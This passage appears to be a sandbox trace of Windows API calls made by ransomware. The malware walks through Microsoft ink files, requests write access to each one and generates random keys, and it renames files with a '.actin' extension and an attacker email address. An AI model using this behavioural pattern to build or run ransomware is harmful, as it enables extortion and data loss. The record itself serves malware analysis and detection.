shared\\ink\\fsdefinitions\\main.xml")) returned 0x20 [0146.776] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.776] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.776] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.776] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.777] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=737) returned 1 [0146.777] CloseHandle (hObject=0x2f4) returned 1 [0146.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml")) returned 0x20 [0146.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui\\oskclearuibase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.777] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.777] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=221) returned 1 [0146.777] CloseHandle (hObject=0x2f4) returned 1 [0146.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml")) returned 0x20 [0146.777] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.777] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskclearui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.778] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.778] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.778] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=471) returned 1 [0146.778] CloseHandle (hObject=0x2f4) returned 1 [0146.778] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml")) returned 0x20 [0146.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu\\oskmenubase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.779] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.779] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=215) returned 1 [0146.779] CloseHandle (hObject=0x2f4) returned 1 [0146.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml")) returned 0x20 [0146.779] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskmenu.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.779] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.779] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.780] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1069) returned 1 [0146.780] CloseHandle (hObject=0x2f4) returned 1 [0146.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml")) returned 0x20 [0146.780] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav\\osknavbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.780] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.780] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.780] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=213) returned 1 [0146.780] CloseHandle (hObject=0x2f4) returned 1 [0146.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml")) returned 0x20 [0146.781] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknav.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.781] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.781] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=1853) returned 1 [0146.782] CloseHandle (hObject=0x2f4) returned 1 [0146.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml")) returned 0x20 [0146.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad\\osknumpadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.782] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.782] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=219) returned 1 [0146.782] CloseHandle (hObject=0x2f4) returned 1 [0146.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml")) returned 0x20 [0146.782] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.782] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\osknumpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.783] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.783] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=924) returned 1 [0146.783] CloseHandle (hObject=0x2f4) returned 1 [0146.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml")) returned 0x20 [0146.783] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.783] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.783] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.783] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=215) returned 1 [0146.783] CloseHandle (hObject=0x2f4) returned 1 [0146.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml")) returned 0x20 [0146.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.784] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.784] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=694) returned 1 [0146.784] CloseHandle (hObject=0x2f4) returned 1 [0146.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml")) returned 0x20 [0146.784] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.784] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.784] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.785] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=805) returned 1 [0146.785] CloseHandle (hObject=0x2f4) returned 1 [0146.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml")) returned 0x20 [0146.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ja-jp-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.785] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.786] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=3823) returned 1 [0146.786] CloseHandle (hObject=0x2f4) returned 1 [0146.786] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml")) returned 0x20 [0146.786] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\symbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.786] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.787] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=591) returned 1 [0146.787] CloseHandle (hObject=0x2f4) returned 1 [0146.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml")) returned 0x20 [0146.787] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.787] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.788] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=9728) returned 1 [0146.788] CloseHandle (hObject=0x2f4) returned 1 [0146.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui")) returned 0x20 [0146.788] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\he-IL\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\he-il\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.788] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0146.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\hr-HR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hr-hr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.790] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=10240) returned 1 [0146.790] CloseHandle (hObject=0x2f4) returned 1 [0146.790] GetFileAttributesW 